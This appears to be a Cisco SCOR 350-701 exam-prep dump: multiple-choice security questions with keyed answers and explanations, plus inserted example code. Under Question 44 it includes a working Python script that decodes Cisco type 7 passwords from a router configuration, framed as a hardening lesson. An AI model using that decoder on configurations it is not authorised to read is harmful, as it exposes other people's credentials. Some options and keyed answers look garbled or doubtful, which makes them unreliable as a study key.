Which technology provides the benefit of Layer 3 through Layer 7 innovative deep packet inspection,
enabling the platform to identify and output various applications within the network traffic flows?

A. Cisco ASAv
B. Cisco Prime Infrastructure
C. Cisco NBAR2
D. Account on Resolution

Answer: C

Explanation

Operating on Cisco IOS and Cisco IOS XE, NBAR2 utilizes innovative deep packet inspection (DPI)
technology to identify a wide variety of applications within the network traffic flow, using L3 to L7 data.

Reference: https://www.cisco.com/c/en/us/td/docs/ios/solutions_docs/avc/guide/avc-user-
guide/avc_tech_overview.pdf

Question 15

An organization must add new firewalls to its infrastructure and wants to use Cisco ASA or Cisco FTD. The
chosen firewalls must provide methods of blocking traffic that include offering the user the option to
bypass the block for certain sites after displaying a warning page and to reset the connection. Which
solution should the organization choose?

A. Cisco ASA because it has an additional module that can be installed to provide multiple blocking
capabilities, whereas Cisco FTD does not.
B. Cisco FTD because it enables interactive blocking and blocking with reset natively, whereas Cisco ASA
does not.
C. Cisco FTD because it supports system rate level traffic blocking, whereas Cisco ASA does not.
D. Cisco ASA because it allows for interactive blocking and blocking with reset to be configured via the
GUI, whereas Cisco FTD does not.

Answer: B

Explanation

From the Firepower Management Center Configuration Guide:

Interactive Block Response Page: Warns users, but also allows them to click a button (or refresh the
page) to load the originally requested site. Users may have to refresh after bypassing the response page
to load page elements that did not load.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/620/configuration/guide/fpmc-
config-guide-v62/http_response_pages_and_interactive_blocking.html

Question 16

An engineer is configuring web filtering for a network using Cisco Umbrella Secure Internet Gateway. The
requirement is that all traffic needs to be filtered. Using the SSL decryption feature, which type of
certificate should be presented to the end-user to accomplish this goal?

A. third-party
B. SubCA
C. self-signed
D. organization owned root

Answer: D

Explanation

The SSL Decryption feature requires that the root certificate be installed on the end-user device.

Reference: https://community.cisco.com/t5/security-blogs/cisco-umbrella-intelligent-proxy-and-ssl-
decryption/ba-p/4453056

Question 17

Which two parameters are used to prevent a data breach in the cloud? (Choose two)

A. encryption
B. complex cloud-based web proxies
C. strong user authentication
D. antispoofing programs
E. DLP solutions

Answer: A C

Explanation

A data breach is a security violation or incident that leads to the theft of sensitive or critical data or its
exposure to an unauthorized party. These incidents can be intentional, such as a database hack, or
accidental, such as an employee emailing confidential files to the wrong recipient.

Two-factor authentication and secure access solutions for cloud apps make it more difficult for
malicious hackers or insiders to compromise users, including those who work remotely or on a contract
basis -> Answer C is correct.

Reference: https://www.cisco.com/c/en/us/products/security/what-is-data-breach.html#~how-to-
prevent-a-breach

In the Data Breaches in Cloud Computing article, encryption is one of the top five methods to prevent data
breach in the cloud -> Answer A is correct.

Question 18

What is the term for when an endpoint is associated to a provisioning WLAN that is shared with guest
access, and the same guest portal is used as the BYOD portal?

A. streamlined access
B. multichannel GUI
C. single-SSID BYOD
D. dual-SSID BYOD

Answer: D

Explanation

If guest access uses one of the named guest accounts, then the same guest portal can be used as the
employee BYOD portal. This flow is called Dual-SSID BYOD, where the endpoint is associated to a
provisioning WLAN which is typically shared with guest access.

Reference: https://community.cisco.com/t5/security-documents/ise-byod-dual-vs-single-ssid-
onboarding/ta-p/3641422

Question 19

What is the function of the crypto isakmp key cisc414685095 address 192.168.50.1
255.255.255.255 command when establishing an IPsec VPN tunnel?

A. It prevents 192.168.50.1 from connecting to the VPN server.
B. It defines that data destined to 192.168.50.1 is going to be encrypted.
C. It configures the pre-shared authentication key for host 192.168.50.1.
D. It configures the local address for the VPN server 192.168.50.1.

Answer: C

Explanation

Note:
+ “address 192.168.50.1 255.255.255.255” means the remote peer is host 192.168.50.1
+ The Phase 1 pre-shared key is “cisc414685095”.

Question 20

Which CLI command is used to enable URL filtering support for shortened URLs on the Cisco ESA?

A. outbreakconfig
B. websecurityadvancedconfig
C. webadvancedconfig
D. websecurityconfig

Answer: B

Explanation

Enabling URL filtering support for shortened URLs can be done only from the CLI, using the
websecurityadvancedconfig command.

Reference: https://www.cisco.com/c/en/us/support/docs/security/email-security-appliance/118775-
technote-esa-00.html

Question 21

Which Cisco ASA deployment model is used to filter traffic between hosts in the same IP subnet using
higher-level protocols without readdressing the network?

A. single context mode
B. routed mode
C. transparent mode
D. multiple context mode

Answer: C

Explanation

An ASA firewall is capable of operating at Layer 2 when running in transparent mode. In this mode it can
filter traffic between hosts using higher-level protocols (e.g. IP addressing and ports) without
readdressing the network.

Reference: https://grumpy-networkers-
journal.readthedocs.io/en/latest/VENDOR/CISCO/FIREWALL/ASA/TRANSPARENTFW.html

Question 22

Which open source tool does Cisco use to create graphical visualizations of network telemetry on Cisco IOS
XE devices?

A. SNMP
B. Splunk

C. Grafana
D. InfluxDB

Answer: C

Explanation

Visualization with Grafana

Grafana is the visualization engine that is used to display the telemetry data.

Reference: https://blogs.cisco.com/developer/getting-started-with-model-driven-telemetry

Note: InfluxDB is used to store the telemetry data.

Question 23

Which Cisco DNA Center Intent API action is used to retrieve the number of devices known to a DNA
Center?

A. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device/count
B. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-
device/startIndex/recordsToReturn
C. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-device
D. GET https://fqdnOrlPofDnaCenterPlatform/dna/intent/api/v1/network-
device?parameter1=value&parameter2=value&…

Answer: A

Explanation

Once the developer has the token, it is possible to get the network devices count.

import requests
BASE_URL = 'https://<fqdnOrIPofDnaCenterPlatform>'  # placeholder for your DNA Center address
headers = {'X-Auth-Token': token}  # token obtained earlier from the authentication API
DEVICES_COUNT_URL = '/dna/intent/api/v1/network-device/count'
response = requests.get(BASE_URL + DEVICES_COUNT_URL, headers=headers, verify=False)
print(response.json())

Reference: https://developer.cisco.com/docs/dna-center/#!devices/devices-api

Question 24

When NetFlow is applied to an interface, which component creates the flow monitor cache that is used to
collect traffic based on the key and nonkey fields in the configured record?

A. flow sampler
B. flow exporter
C. records
D. flow monitor

Answer: D

Explanation

The Netflow flow monitor component is used to provide the actual traffic monitoring on a configured
interface. When a flow monitor is applied to an interface, a flow monitor cache is created that is used to
collect the traffic based on the key and nonkey fields in the configured record.

Reference: https://www.ciscopress.com/articles/article.asp?p=1730890
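The key/nonkey distinction is easiest to see in a small model of the cache. The following is an added example, not Cisco code: a toy flow monitor cache in JavaScript in which the key fields (addresses, protocol, ports) identify a cache entry and the nonkey fields (packet and byte counters, first and last seen) are accumulated into it. The sample packets are constructed for the example.

```javascript
// Key fields: a packet with a new combination of these starts a new cache entry.
const KEY_FIELDS = ["src", "dst", "proto", "sport", "dport"];

function flowKey(pkt) {
  return KEY_FIELDS.map((f) => String(pkt[f])).join("|");
}

// Build the cache: one entry per distinct key; the nonkey fields (packets, bytes,
// first and last timestamp) are updated on every packet that matches the key.
function buildFlowCache(packets) {
  const cache = new Map();
  for (const pkt of packets) {
    const key = flowKey(pkt);
    let entry = cache.get(key);
    if (!entry) {
      entry = {
        src: pkt.src, dst: pkt.dst, proto: pkt.proto, sport: pkt.sport, dport: pkt.dport,
        packets: 0, bytes: 0, first: pkt.ts, last: pkt.ts,
      };
      cache.set(key, entry);
    }
    entry.packets += 1;
    entry.bytes += pkt.len;
    if (pkt.ts < entry.first) entry.first = pkt.ts;
    if (pkt.ts > entry.last) entry.last = pkt.ts;
  }
  return cache;
}

// Records in the shape a flow exporter would hand to a collector.
function exportRecords(cache) {
  return Array.from(cache.values()).map((e) => ({ ...e, duration: e.last - e.first }));
}

// Constructed sample: three packets of one HTTPS flow and a single DNS query.
const SAMPLE_PACKETS = [
  { ts: 100, src: "10.1.1.5", dst: "203.0.113.10", proto: 6, sport: 51000, dport: 443, len: 60 },
  { ts: 101, src: "10.1.1.5", dst: "203.0.113.10", proto: 6, sport: 51000, dport: 443, len: 1500 },
  { ts: 102, src: "10.1.1.5", dst: "198.51.100.53", proto: 17, sport: 40000, dport: 53, len: 80 },
  { ts: 103, src: "10.1.1.5", dst: "203.0.113.10", proto: 6, sport: 51000, dport: 443, len: 1500 },
];
```

Changing which fields are in KEY_FIELDS is the equivalent of editing the flow record: dropping the source port, for instance, would merge all of a client's connections to one server port into a single cache entry.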

Question 25

Refer to the exhibit.

ASA# show service-policy sfr

Global policy:
Service-policy: global_policy
Class-map: SFR
SFR: card status Up, mode fail-open monitor-only
packet input 0, packet output 44715478687, drop 0, reset-drop 0

What are two indications of the Cisco Firepower Services Module configuration? (Choose two)

A. The module is operating in IPS mode.
B. The module fails to receive redirected traffic.
C. Traffic is blocked if the module fails.
D. Traffic continues to flow if the module fails.
E. The module is operating in IDS mode.

Answer: D E

Explanation

In a passive deployment, a copy of the traffic is sent to the SFR service module, but it is not returned to
the ASA. Passive mode allows you to view the actions that the SFR module would have completed in
regards to the traffic. It also allows you to evaluate the content of the traffic, without an impact to the
network.

If you want to configure the SFR module in passive mode, use the monitor-only keyword. If you do not
include the keyword, the traffic is sent in inline mode.

ciscoasa(config-pmap-c)# sfr fail-open monitor-only

Reference: https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-
configure-firepower-00.html

-> This SFR module is configured in passive mode (monitor-only)-> Answer E is correct.

In monitor-only mode, the input counters remain at zero. -> Answer B is not correct.

The Cisco ASA 5500 security appliance is not just a plain firewall. With an add-on security module (AIP-
SSM), you can transform the ASA 5500 into an IDS/IPS sensor as well.

The Sensor operates in either “Promiscuous Mode” (IDS functionality) or “Inline Mode” (IPS functionality).

In Promiscuous Mode, the sensor does not intervene in traffic flow, but just “sniffs” the traffic that passes
through the firewall and takes appropriate actions in the event of an attack -> This module is operating in
IDS mode.

Reference: https://www.networkstraining.com/cisco-ids-ips-module-for-cisco-asa-firewalls-aip-ssm/

Question 26

Why is it important for the organization to have an endpoint patching strategy?

A. so the organization can identify endpoint vulnerabilities
B. so the network administrator is notified when an existing bug is encountered
C. so the internal PSIRT organization is aware of the latest bugs
D. so the latest security fixes are installed on the endpoints

Answer: A

Question 27

On which system are InfluxDB and Grafana used to pull the data and display the visualization
information?

A. Docker containers
B. Windows Server 2019
C. specialized Cisco Linux system
D. Windows Server 2016

Answer: C

Question 28

Which Cisco ASA Platform mode disables the threat detection features except for Advanced Threat
Statistics?

A. routed
B. multiple context
C. cluster
D. transparent

Answer: B

Explanation

Cisco ASA Threat Detection does not support multiple context mode.

Reference: https://grumpy-networkers-
journal.readthedocs.io/en/latest/VENDOR/CISCO/FIREWALL/ASA/THREATDETECT.html

Question 29

Which two parameters are used for device compliance checks? (Choose two)

A. device operating system version
B. DHCP snooping checks
C. Windows registry values
D. endpoint protection software version
E. DNS integrity checks

Answer: A D

Question 30

A network engineer entered the snmp-server user asmith myv7 auth sha cisco priv aes 256
cisc0414685095 command and needs to send SNMP information to a host at 10.255.255.1. Which
command achieves this goal?

A. snmp-server host inside 10.255.255.1 version 3 asmith
B. snmp-server host inside 10.255.255.1 snmpv3 myv7
C. snmp-server host inside 10.255.255.1 snmpv3 asmith
D. snmp-server host inside 10.255.255.1 version 3 myv7

Answer: A

Explanation

The command snmp-server user asmith myv7 auth sha cisco priv aes 256
cisc0414685095 creates a user named “asmith” who belongs to group “myv7”. The authentication password
for this user is “cisco” and “cisc0414685095” is the privacy (encryption) secret.

In order to send SNMP information to a remote host, we have to configure the username (not password) in
the “snmp-server host …” command. So the command must include “asmith” as the username. And we
configure SNMPv3 by using keyword “version 3”, not “snmpv3”.

Question 31

An engineer is configuring Cisco WSA and needs to enable a separated email transfer flow from the
Internet and from the LAN. Which deployment mode must be used to accomplish this goal?

A. two-interface
B. single interface
C. multi-context
D. transparent

Answer: A

Explanation

The Cisco ESA can be deployed in different ways. Similar to the Cisco WSA, the Cisco ESA can be deployed
with a single physical interface to filter email to and from your mail servers or in a two-interface
configuration. When you configure the Cisco ESA with two interfaces, one interface is used for email
transfers to and from the Internet and the other interface is used for email transfers to and from the
internal servers.

Reference: CCNP And CCIE Security Core SCOR 350-701 Official Cert Guide

Question 32

A small organization needs to reduce the VPN bandwidth load on their headend Cisco ASA in order to
ensure that bandwidth is available for VPN users needing access to corporate resources on the 10.0.0.0/24
local HQ network. How is this accomplished without adding additional devices to the network?

A. Configure VPN load balancing to send non-corporate traffic straight to the internet.
B. Use split tunneling to tunnel traffic for the 10.0.0.0/24 network only.
C. Configure VPN load balancing to distribute traffic for the 10.0.0.0/24 network.
D. Use split tunneling to tunnel all traffic except for the 10.0.0.0/24 network.

Answer: B

Question 33

Which benefit does DMVPN provide over GETVPN?

A. DMVPN can be used over the public Internet, and GETVPN requires a private network
B. DMVPN is a tunnel-less VPN, and GETVPN is tunnel-based.
C. DMVPN supports QoS, multicast, and routing, and GETVPN supports only QoS.
D. DMVPN supports non-IP protocols, and GETVPN supports only IP protocols.

Answer: A

Explanation

DMVPN, FlexVPN and GETVPN comparison (the comparison table from the original is not reproduced here).

Note: GETVPN is a tunnel-less VPN while DMVPN is tunnel-based.

Question 34

Which system facilitates deploying microsegmentation and multi-tenancy services with a policy-based
container?

A. Docker
B. SDLC
C. Lambda
D. Contiv

Answer: D

Explanation

Contiv is an open source project that delivers policy-based container networking. The idea behind Contiv
is to make it easier for end users to deploy micro-services in their environments.

Contiv provides a higher level of networking abstraction for microservices. Contiv secures your application
using a rich policy framework. It provides built-in service discovery and service routing for scale out
services.

Reference: http://contiv.ciscolive.com/pod5/Intro/contiv_intro

Question 35

An engineer needs to configure an access control policy rule to always send traffic for inspection without
using the default action. Which action should be configured for this rule?

A. monitor
B. allow
C. trust
D. block

Answer: B

Explanation

Monitor evaluates traffic first. Monitor rules track and log network traffic. The system continues to match
traffic against additional rules to determine whether to permit or deny it. -> Therefore monitor rule still
uses other rules below, including the default action.

For Allow rule, matching traffic is allowed; however, prohibited files, malware, intrusions, and exploits
within that traffic are detected and blocked. Remaining non-prohibited, non-malicious traffic is allowed to
its destination, though it is still subject to identity requirements and rate limiting. You can configure Allow
rules that perform only file inspection, or only intrusion inspection, or neither.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/610/configuration/guide/fpmc-
config-guide-v61/access_control_rules.html

Question 36

Which two functions does the Cisco Advanced Phishing Protection solution perform in trying to protect from
phishing attacks? (Choose two)

A. uses a static algorithm to determine malicious
B. determines if the email messages are malicious
C. does a real-time user web browsing behavior analysis
D. blocks malicious websites and adds them to a block list
E. provides a defense for on-premises email deployments

Answer: B E

Explanation

Benefits of Cisco Advanced Phishing Protection

+ Provides another layer of defense to more effectively secure your email environment. -> Answer E is
correct.
+ Automatically removes malicious emails from the recipient’s inbox and calls out identity deception
techniques to prevent wire fraud or other advanced attacks. -> Answer B is correct.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa13-
5/user_guide/b_ESA_Admin_Guide_13-5/m_advanced_phishing_protection.html

Question 37

What are two things to consider when using PAC files with the Cisco WSA? (Choose two)

A. If the WSA host port is changed, the default port redirects web traffic to the correct port automatically
B. The WSA hosts PAC files on port 6001 by default.
C. PAC files use if-else statements to determine whether to use a proxy or a direct connection for traffic
between the PC and the host.

D. By default, they direct traffic through a proxy when the PC and the host are on the same subnet
E. The WSA hosts PAC files on port 9001 by default.

Answer: C E

Explanation

By default, the proxy PAC file would be hosted on port 9001. When using WSA to host PAC files, by
default, we need to point the browser to the following location http://WSA_IP:9001/pacfile.pac -> Answer
B is not correct while answer E is correct.

The PAC file checks the local IP subnet address of the PC and then makes a decision based on IF / ELSE
statement/s -> Answer C is correct.

If the default port is changed in the PAC file hosting settings, then we would need to change the port
accordingly in the above URL -> Answer A is not correct.

Reference: https://www.cisco.com/c/en/us/support/docs/security/web-security-appliance/118082-qanda-
wsa-00.html
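The IF / ELSE decision described above is easiest to see in an actual PAC file. The following is an added example, not Cisco's code and not a file from the page: a PAC file of the kind the WSA could host at http://WSA_IP:9001/pacfile.pac. The proxy name wsa.example.com:3128, the corporate range 10.0.0.0/8, and the internal domain suffix corp.example are assumptions. Browsers call FindProxyForURL(url, host) and supply the client address through the built-in myIpAddress(); the optional third parameter is added here so the logic can be exercised outside a browser, and inSubnet() re-implements the built-in isInNet() for the same reason.

```javascript
// Parse a dotted-quad IPv4 address into a 32-bit unsigned integer.
function ipToInt(ip) {
  const parts = ip.split(".").map(Number);
  if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error("invalid IPv4 address: " + ip);
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// Equivalent of the PAC built-in isInNet(ip, pattern, mask) for dotted-quad inputs
// (added so the file also runs under Node, where the built-in does not exist).
function inSubnet(ip, network, mask) {
  const m = ipToInt(mask);
  return ((ipToInt(ip) & m) >>> 0) === ((ipToInt(network) & m) >>> 0);
}

// PAC entry point. The clientIp parameter is an addition for offline testing; in a
// browser it is omitted and myIpAddress() supplies the PC's address.
function FindProxyForURL(url, host, clientIp) {
  const myIp = clientIp || (typeof myIpAddress === "function" ? myIpAddress() : "0.0.0.0");

  // Plain hostnames (no dots) and the internal domain are reached directly.
  if (host.indexOf(".") === -1 || /\.corp\.example$/.test(host)) {
    return "DIRECT";
  }

  // PCs on the corporate LAN go through the WSA; "; DIRECT" is the fallback the
  // browser uses if the proxy does not answer.
  if (inSubnet(myIp, "10.0.0.0", "255.0.0.0")) {
    return "PROXY wsa.example.com:3128; DIRECT";
  }

  // Anything else (e.g. a laptop on a home network) is not behind the WSA.
  return "DIRECT";
}
```

Note that the decision is driven by the PC's own subnet, not by whether the PC and the destination share a subnet, which is why answer D in the question is wrong.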

Question 38

When implementing transparent user identification for single sign-on with Internet Explorer, how is the
redirect hostname configured?

A. as an IP address
B. as a FQDN
C. as a distinguished name
D. as a short host name

Answer: D

Explanation

Configuring Single-Sign-on
Obtaining credentials transparently facilitates a single-sign-on environment. Transparent user identification
is an authentication realm setting.
For Internet Explorer, be sure the Redirect Hostname is the short host name (containing no dots) or the
NetBIOS name rather than a fully qualified domain.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_01001.html

Question 39

What kind of service lets a user access a web application that is managed, updated, and maintained by the
service provider?

A. IaC
B. IaaS
C. PaaS
D. SaaS

Answer: D

Question 40

What are two ways a network administrator transparently identifies users using Active Directory on the
Cisco WSA? (Choose two)

A. Create NTLM or Kerberos authentication realm and enable transparent user identification
B. The eDirectory client must be installed on each client workstation
C. Deploy a separate eDirectory server; the client IP address is recorded in this server
D. Create an LDAP authentication realm and disable transparent user identification
E. Deploy a separate Active Directory agent such as Cisco Context Directory Agent

Answer: A E

Explanation

Transparently identify users with authentication realms – This option is available when one or more
authentication realms are configured to support transparent identification using one of the following
authentication servers:
Active Directory – Create an NTLM or Kerberos authentication realm and enable transparent user
identification. In addition, you must deploy a separate Active Directory agent such as Cisco’s Context
Directory Agent.
LDAP – Create an LDAP authentication realm configured as an eDirectory, and enable transparent user
identification.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_01001.html

Question 41

Which technology limits communication between nodes on the same network segment to individual
applications?

A. serverless infrastructure
B. machine-to-machine firewalling
C. SaaS deployment
D. microsegmentation

Answer: D

Explanation

Micro-segmentation creates secure zones across cloud and data center environments to isolate application
workloads from one another and secure them individually.

Question 42

Which MDM configuration provides scalability?

A. BYOD support without extra appliance or licenses
B. enabling use of device features such as camera use
C. pushing WPA2-Enterprise settings automatically to devices
D. automatic device classification with level 7 fingerprinting

Answer: C

Explanation

Scalable endpoint configuration

Systems Manager also makes it easy to define and deploy network settings like wireless connectivity,
security settings, and remote VPN access to all devices on your network at once. Instead of manually
provisioning devices for network connectivity, or relying on end users to do so, configure settings such as
WPA2-Enterprise in the dashboard, and let the cloud push the settings to end-user devices.

Reference: https://www.cloudwifiworks.com/Solutions-Mobile-Device-Management.asp

Question 43

Drag and drop the concepts from the left onto the correct descriptions on the right.

Answer:

BYOD: My Devices portal that allows users to register their device
posture assessment: Results can have a status of compliant or noncompliant
profiling: requires probes to collect attributes of connected endpoints
guest services: sponsor portal that is used to gain access to network resources

Explanation

Posture assessment includes a set of rules in a security policy that define a series of checks before an
endpoint is granted access to the network. Posture assessment checks include the installation of operating
system patches, host-based firewalls, antivirus and antimalware software, disk encryption, and more.

-> Posture assessment can be compliant or noncompliant.

Cisco Identity Services Engine (Cisco ISE) guest services enable you to provide secure network access to
guests such as visitors, contractors, consultants, and customers.

Sponsor Accounts: Use the Sponsor portal to create temporary accounts for authorized visitors to securely
access your corporate network or the Internet. After creating the guest accounts, you can also use the
Sponsor portal to manage these accounts and provide account details to the guests.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/2-
4/admin_guide/b_ISE_admin_guide_24/m_ise_guest.html

Question 44

An engineer is configuring device-hardening on a router in order to prevent credentials from being seen if
the router configuration was compromised. Which command should be used?

A. username <username> password <password>
B. username <username> privilege 15 password <password>
C. service password-recovery
D. service password-encryption

Answer: D
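Answer D is the option the exam wants, but the caveat matters in practice: service password-encryption applies Cisco type 7 obfuscation, which anyone holding the configuration can reverse in milliseconds. It defeats shoulder-surfing of show running-config, not theft of the file. The script below is an added example, not part of the original question set, that recovers every type 7 credential from a constructed configuration excerpt; the XOR key is the well-known constant every type 7 decoder uses, and the sample configuration lines are invented for the example. Credentials that must survive configuration theft belong in enable secret and username ... secret with type 8 or 9 hashes, which this script cannot recover.

```python
import re

# The XOR key used by Cisco type 7 obfuscation. It is a published constant,
# which is exactly why type 7 is no protection against someone holding the config.
_XLAT = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decode(encoded: str) -> str:
    """Recover the plaintext from a 'password 7 <hex>' value.

    Format: two decimal digits of seed, then one hex pair per character,
    each XORed with the key byte at position (seed + index) mod len(key).
    """
    if len(encoded) < 4 or len(encoded) % 2 or not re.fullmatch(r"[0-9A-Fa-f]+", encoded):
        raise ValueError("not a well-formed type 7 string")
    seed = int(encoded[:2], 10)
    chars = []
    for i, pos in enumerate(range(2, len(encoded), 2)):
        byte = int(encoded[pos:pos + 2], 16)
        chars.append(chr(byte ^ ord(_XLAT[(seed + i) % len(_XLAT)])))
    return "".join(chars)


def type7_encode(plain: str, seed: int = 9) -> str:
    """Produce the string IOS would store; seed is the 0-15 starting offset into the key."""
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    body = "".join(
        f"{ord(c) ^ ord(_XLAT[(seed + i) % len(_XLAT)]):02X}" for i, c in enumerate(plain)
    )
    return f"{seed:02d}{body}"


# Matches 'username X ... password 7 <hex>', 'enable password 7 <hex>' and a bare
# line-mode 'password 7 <hex>'. Lines using 'secret 5/8/9' never match: those are hashes.
_TYPE7_LINE = re.compile(
    r"^\s*(?:username\s+(\S+)\s+)?(?:.*?\s)?password\s+7\s+([0-9A-Fa-f]+)\s*$",
    re.MULTILINE,
)


def recover_from_config(config: str) -> dict:
    """Map each type 7 credential in a config to its plaintext, keyed by username
    (or 'enable' / 'line' when the entry has no username)."""
    found = {}
    for match in _TYPE7_LINE.finditer(config):
        user, encoded = match.group(1), match.group(2)
        line = match.group(0).strip()
        key = user or ("enable" if line.startswith("enable") else "line")
        found[key] = type7_decode(encoded)
    return found


# Constructed configuration excerpt for the example; not taken from a real device.
SAMPLE_CONFIG = f"""\
service password-encryption
enable password 7 094F471A1A0A
username admin privilege 15 password 7 {type7_encode('S3cret!', 14)}
username ops secret 9 $9$examplehashnotrecoverable
line vty 0 4
 password 7 {type7_encode('vtyP@ss', 3)}
"""


if __name__ == "__main__":
    for name, plain in recover_from_config(SAMPLE_CONFIG).items():
        print(f"{name}: {plain}")
```

Running it prints the enable password, the admin password and the vty password in clear; the ops account, stored with secret 9 (scrypt), is not touched because there is nothing to reverse. That contrast is the real hardening lesson behind the question.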

Question 45

What are two security benefits of an MDM deployment? (Choose two)

A. distributed software upgrade
B. robust security policy enforcement
C. on-device content management
D. privacy control checks
E. distributed dashboard

Answer: B C

Question 46

Refer to the exhibit.

The DHCP snooping database resides on router R1, and dynamic ARP inspection is configured only on
switch SW2. Which ports must be configured as untrusted so that dynamic ARP inspection operates
normally?

A. P2 and P3 only
B. P5, P6, and P7 only
C. P1, P2, P3, and P4 only
D. P2, P3, and P6 only

Answer: B

Explanation

In a typical network configuration for DAI, all ports connected to host ports are configured as untrusted,
while all ports connected to switches are configured as trusted. With this configuration, all ARP packets
entering the network from a given switch will have passed the security check.

Configuring interfaces as untrusted when they should be trusted can result in a loss of connectivity.
Configuring interfaces to be trusted when they are actually untrusted leaves a security hole in the
network.

Reference: https://www.cisco.com/c/en/us/td/docs/switches/lan/catalyst4500/12-
2/25ew/configuration/guide/conf/dynarp.html

Question 47

Which Cisco platform provides an agentless solution to provide visibility across the network including
encrypted traffic analytics to detect malware in encrypted traffic without the need for decryption?

A. Cisco Advanced Malware Protection
B. Cisco Stealthwatch
C. Cisco Identity Services Engine
D. Cisco AnyConnect

Answer: B

Question 48

A network engineer is tasked with configuring a Cisco ISE server to implement external authentication
against Active Directory. What must be considered about the authentication requirements? (Choose two)

A. RADIUS communication must be permitted between the ISE server and the domain controller
B. The ISE account must be a domain administrator in Active Directory to perform JOIN operations
C. Active Directory only supports user authentication by using MSCHAPv2
D. LDAP communication must be permitted between the ISE server and the domain controller
E. Active Directory supports user and machine authentication by using MSCHAPv2

Answer: D E

Explanation

Cisco ISE supports user and machine authentication and change password against Active Directory using
EAP-FAST and PEAP with an inner method of Microsoft Challenge Handshake Authentication Protocol
version 2 (MS-CHAPv2) and Extensible Authentication Protocol-Generic Token Card (EAP-GTC) -> Answer
C is not correct while answer E is correct.

The Active Directory username that you provide while joining to an Active Directory domain should be
predefined in Active Directory and should have any one of the following permissions:
–Add the workstation to the domain to which you are trying to connect.
–On the computer where the Cisco ISE account was created, establish permissions for creating computer
objects or deleting computer objects before you join Cisco ISE to the domain.
–Permissions for searching users and groups that are required for authentication.

-> Therefore the ISE account must not be a domain administrator in Active Directory -> Answer B is not
correct.

Reference: https://www.cisco.com/en/US/docs/security/ise/1.0/user_guide/ise10_man_id_stores.html

ISE uses LDAP, Kerberos, and MSRPC to communicate with AD during the join/leave and authentication
process -> Answer D is correct.

Reference: https://www.cisco.com/c/en/us/support/docs/security/identity-services-engine/215233-
identity-service-engine-ise-and-active.html

Question 49

Which CoA response code is sent if an authorization state is changed successfully on a Cisco IOS device?

A. CoA-ACK
B. CoA-NAK
C. CoA-MAB
D. CoA-NCL

Answer: A

Explanation

If an authorization state is changed successfully, a positive acknowledgment (ACK) is sent.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/15-sy/sec-usr-
aaa-15-sy-book/sec-rad-coa.html

Question 50

What is a feature of container orchestration?

A. ability to deploy Amazon ECS clusters by using the Cisco Container Platform data plane
B. ability to deploy Kubernetes clusters in air-gapped sites
C. ability to deploy Amazon EKS clusters by using the Cisco Container Platform data plane
D. automated daily updates

Answer: B

Explanation

The ability to deploy Kubernetes clusters in air-gapped sites

Cisco Container Platform (CCP) tenant images contain all the necessary binaries and don’t need internet
access to function.

Reference: https://www.cisco.com/c/en/us/products/cloud-systems-management/container-
platform/index.html#~stickynav=3

Question 51

Which metric is used by the monitoring agent to collect and output packet loss and jitter information?

A. WSAv performance
B. AVC performance
C. RTP performance
D. OTCP performance

Answer: C

Explanation

The monitoring agent collects:

– TCP performance metrics such as bandwidth usage, response time, and latency.
– RTP performance metrics such as packet loss and jitter.

Reference: https://www.cisco.com/c/en/us/td/docs/ios/solutions_docs/avc/ios15-4-3T-ios-xe3-13/avc-
user-guide-ios15-4-3T-ios-xe3-13.pdf

Question 52

Which solution for remote workers enables protection, detection, and response on the endpoint against
known and unknown threats?

A. Cisco AMP for Endpoints
B. Cisco AnyConnect
C. Cisco Umbrella
D. Cisco Duo

Answer: A

Question 53

Which two components do southbound APIs use to communicate with downstream devices? (Choose two)

A. services running over the network
B. external application APIs
C. OpenFlow
D. applications running over the network
E. OpFlex

Answer: C E

Question 54

Which solution detects threats across a private network, public clouds, and encrypted traffic?

A. Cisco Stealthwatch
B. Cisco CTA
C. Cisco Encrypted Traffic Analytics
D. Cisco Umbrella

Answer: A

Explanation

Stealthwatch provides a consistent experience for detecting threats across private networks and multiple-
public clouds such as Microsoft Azure, Amazon Web Services, and Google Public Cloud. Stealthwatch
closely monitors the activity of every device on the network and is able to create a baseline of normal
behavior. Stealthwatch automatically normalizes traffic events gathered natively from your network
telemetry and natively from flow logs generated by your cloud infrastructure, and presents you with a single
view of the threats across your entire environment.

Reference: https://blogs.cisco.com/security/cisco-stealthwatch-becomes-the-only-security-analytics-
product-to-detect-threats-across-private-networks-public-clouds-and-encrypted-traffic

Question 55

What limits communication between applications or containers on the same node?

A. microservicing
B. container orchestration
C. microsegmentation
D. Software-Defined Access

Answer: C

Explanation

Microservices are about dissecting applications to smaller units and run those units independently
instead of running them in a monolithic application. But this question asks about communication between
applications so “microservicing” is not correct.

Micro-segmentation is a network security technique that isolates different workloads from one another
within a data center. A workload can be broadly defined as the resources and processes needed to run an
application. Hosts, virtual machines and containers are a few examples of workloads.

Question 56

Which Cisco security solution integrates with cloud applications like Dropbox and Office 365 while
protecting data from being exfiltrated?

A. Cisco Talos
B. Cisco Stealthwatch Cloud
C. Cisco Cloudlock
D. Cisco Umbrella Investigate

Answer: C

Question 57

What do tools like Jenkins, Octopus Deploy, and Azure DevOps provide in terms of application and
infrastructure automation?

A. container orchestration
B. cloud application security broker
C. compile-time instrumentation
D. continuous integration and continuous deployment

Answer: D

Question 58

Which type of attack is MFA an effective deterrent for?

A. ping of death
B. phishing
C. teardrop
D. syn flood

Answer: B

Explanation

What types of cyberattacks does MFA protect against?

+ Phishing
+ Spear phishing
